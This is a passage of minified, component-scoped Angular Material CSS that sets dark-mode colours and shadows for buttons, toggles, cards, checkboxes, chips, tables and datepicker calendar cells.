.mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-flat-button.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-fab.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%] .mat-stroked-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%] .mat-flat-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%] .mat-raised-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-raised-button[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-raised-button.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%] .mat-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%] .mat-mini-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%] .mat-mini-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%] .mat-mini-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-standalone[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%] .mat-button-toggle-group[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .darkMode[_ngcontent-%COMP%] .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:none}.darkMode[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%] .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#fff;background:#424242}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-appearance-standard[_ngcontent-%COMP%] .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:solid 1px #595959}.darkMode[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px #595959}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-group-appearance-standard.mat-button-toggle-vertical[_ngcontent-%COMP%] .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:none;border-top:solid 1px #595959}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#212121;color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-checked.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-disabled[_ngcontent-%COMP%]{color:#ffffff4d;background-color:#000}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-disabled.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-disabled.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#424242}.darkMode[_ngcontent-%COMP%] .mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]{border:solid 1px #595959}.darkMode[_ngcontent-%COMP%] .mat-card[_ngcontent-%COMP%]{background:#424242;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-card[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-card.mat-card-flat[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.darkMode[_ngcontent-%COMP%] .mat-card-subtitle[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-checkbox-checkmark[_ngcontent-%COMP%]{fill:#303030}.darkMode[_ngcontent-%COMP%] .mat-checkbox-checkmark-path[_ngcontent-%COMP%]{stroke:#303030!important}.darkMode[_ngcontent-%COMP%] .mat-checkbox-mixedmark[_ngcontent-%COMP%]{background-color:#303030}.darkMode[_ngcontent-%COMP%] .mat-checkbox-indeterminate.mat-primary[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-checkbox-checked.mat-primary[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-checkbox-indeterminate.mat-accent[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-checkbox-checked.mat-accent[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-checkbox-indeterminate.mat-warn[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-checkbox-checked.mat-warn[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-checkbox-disabled.mat-checkbox-checked[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-checkbox-disabled.mat-checkbox-indeterminate[_ngcontent-%COMP%] .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#686868}.darkMode[_ngcontent-%COMP%] .mat-checkbox-disabled[_ngcontent-%COMP%]:not(.mat-checkbox-checked) .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#686868}.darkMode[_ngcontent-%COMP%] .mat-checkbox-disabled[_ngcontent-%COMP%] .mat-checkbox-label[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-checkbox[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-primary .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-primary .mat-ripple-element[_ngcontent-%COMP%]{background:#2196f3}.darkMode[_ngcontent-%COMP%] .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-accent .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-accent .mat-ripple-element[_ngcontent-%COMP%]{background:#7b1fa2}.darkMode[_ngcontent-%COMP%] .mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-warn .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-warn .mat-ripple-element[_ngcontent-%COMP%]{background:#f44336}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip[_ngcontent-%COMP%]{background-color:#616161;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled):active{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:not(.mat-chip-disabled) .mat-chip-remove[_ngcontent-%COMP%]:hover{opacity:.54}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-disabled[_ngcontent-%COMP%]{opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip[_ngcontent-%COMP%]:after{background:white}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-primary[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-warn[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%] .mat-chip-remove[_ngcontent-%COMP%]{color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-chip.mat-standard-chip.mat-chip-selected.mat-accent[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.darkMode[_ngcontent-%COMP%] .mat-table[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%] .mat-table[_ngcontent-%COMP%] thead[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-table[_ngcontent-%COMP%] tbody[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-table[_ngcontent-%COMP%] tfoot[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] mat-header-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] mat-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] mat-footer-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] [mat-header-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] [mat-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] [mat-footer-row][_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-table-sticky[_ngcontent-%COMP%]{background:inherit}.darkMode[_ngcontent-%COMP%] mat-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] mat-header-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] mat-footer-row[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] th.mat-header-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] td.mat-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] td.mat-footer-cell[_ngcontent-%COMP%]{border-bottom-color:#ffffff1f}.darkMode[_ngcontent-%COMP%] .mat-header-cell[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-cell[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-footer-cell[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-calendar-arrow[_ngcontent-%COMP%]{fill:#fff}.darkMode[_ngcontent-%COMP%] .mat-datepicker-toggle[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content[_ngcontent-%COMP%] .mat-calendar-next-button[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content[_ngcontent-%COMP%] .mat-calendar-previous-button[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-calendar-table-header-divider[_ngcontent-%COMP%]:after{background:rgba(255,255,255,.12)}.darkMode[_ngcontent-%COMP%] .mat-calendar-table-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-calendar-body-label[_ngcontent-%COMP%]{color:#ffffffb3}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-cell-content[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#fff;border-color:transparent}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-form-field-disabled[_ngcontent-%COMP%] .mat-date-range-input-separator[_ngcontent-%COMP%]{color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-in-preview[_ngcontent-%COMP%]{color:#ffffff3d}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#ffffff80}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-today[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){border-color:#ffffff4d}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(33,150,243,.2)}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(33,150,243,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#2196f366}.darkMode[_ngcontent-%COMP%] .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%] .cdk-keyboard-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%] .cdk-program-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}@media (hover: hover){.darkMode[_ngcontent-%COMP%] .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#2196f34d}}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f;background-color:#424242;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(123,31,162,.2)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(123,31,162,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#7b1fa266}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .cdk-keyboard-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .cdk-program-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}@media (hover: hover){.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-accent[_ngcontent-%COMP%] .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#7b1fa24d}}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%]:before{background:rgba(244,67,54,.2)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%]:before{background:rgba(249,171,0,.2)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before{background:linear-gradient(to right,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-end[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] [dir=rtl][_ngcontent-%COMP%] .mat-calendar-body-comparison-bridge-start[_ngcontent-%COMP%]:before{background:linear-gradient(to left,rgba(244,67,54,.2) 50%,rgba(249,171,0,.2) 50%)}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-range[_ngcontent-%COMP%] > .mat-calendar-body-comparison-identical[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range.mat-calendar-body-in-range[_ngcontent-%COMP%]:after{background:#a8dab5}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-comparison-identical.mat-calendar-body-selected[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-in-comparison-range[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background:#46a35e}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-disabled[_ngcontent-%COMP%] > .mat-calendar-body-selected[_ngcontent-%COMP%]{background-color:#f4433666}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-today.mat-calendar-body-selected[_ngcontent-%COMP%]{box-shadow:inset 0 0 0 1px #fff}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .cdk-keyboard-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical), .darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .cdk-program-focused[_ngcontent-%COMP%] .mat-calendar-body-active[_ngcontent-%COMP%] > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}@media (hover: hover){.darkMode[_ngcontent-%COMP%] .mat-datepicker-content.mat-warn[_ngcontent-%COMP%] .mat-calendar-body-cell[_ngcontent-%COMP%]:not(.mat-calendar-body-disabled):hover > .mat-calendar-body-cell-content[_ngcontent-%COMP%]:not(.mat-calendar-body-selected):not(.mat-calendar-body-comparison-identical){background-color:#f443364d}}.darkMode[_ngcontent-%COMP%] .mat-datepicker-content-touch[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-datepicker-toggle-active[_ngcontent-%COMP%]{color:#2196f3}.darkMode[_ngcontent-%COMP%] 